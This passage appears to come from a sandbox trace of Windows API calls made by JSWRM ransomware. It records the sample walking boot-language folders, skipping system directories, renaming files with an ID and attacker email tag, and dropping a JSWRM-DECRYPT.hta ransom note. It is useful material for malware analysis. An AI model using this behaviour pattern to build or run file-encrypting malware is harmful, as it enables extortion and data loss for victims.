[0063.902] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.902] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.902] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.902] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.902] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.902] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.902] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.902] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.903] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.903] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.903] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.903] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.903] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.903] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.903] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.903] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.904] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.904] CloseHandle (hObject=0xffffffff) returned 1 [0063.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0063.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0063.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0063.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0063.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.905] MoveFileW (lpExistingFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.905] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc02d1c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cc02d1c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cc02d1c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.905] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0063.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0063.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.906] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.906] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0063.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0063.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.906] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.947] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9252115471983208) returned 0 [0063.947] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.947] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.947] CloseHandle (hObject=0xffffffff) returned 1 [0063.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0063.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0063.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0063.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225bb0 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0063.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225bb0 | out: hHeap=0x1e0000) returned 1 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.948] MoveFileW (lpExistingFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\fr-FR\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.948] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.948] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0063.948] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0063.948] lstrcmpiW (lpString1="hr-HR", lpString2=".") returned 1 [0063.948] lstrcmpiW (lpString1="hr-HR", lpString2="..") returned 1 [0063.948] lstrcmpiW (lpString1="hr-HR", lpString2="...") returned 1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="windows") returned -1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="recovery") returned -1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="perflogs") returned -1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="documents and settings") returned 1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="$RECYCLE.BIN") returned 1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="system volume information") returned -1 [0063.949] lstrcmpiW (lpString1="hr-HR", lpString2="msocache") returned -1 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.949] GetFileAttributesW (lpFileName="C:\\Boot\\hr-HR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\hr-hr\\jswrm-decrypt.hta")) returned 0xffffffff [0063.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237038 [0063.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.949] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\hr-hr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.950] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.950] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.951] CloseHandle (hObject=0x450) returned 1 [0063.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237038 | out: hHeap=0x1e0000) returned 1 [0063.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0063.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.953] GetFileAttributesW (lpFileName="C:\\Boot\\hr-HR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\hr-hr\\jswrm-decrypt.hta")) returned 0x20 [0063.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.953] 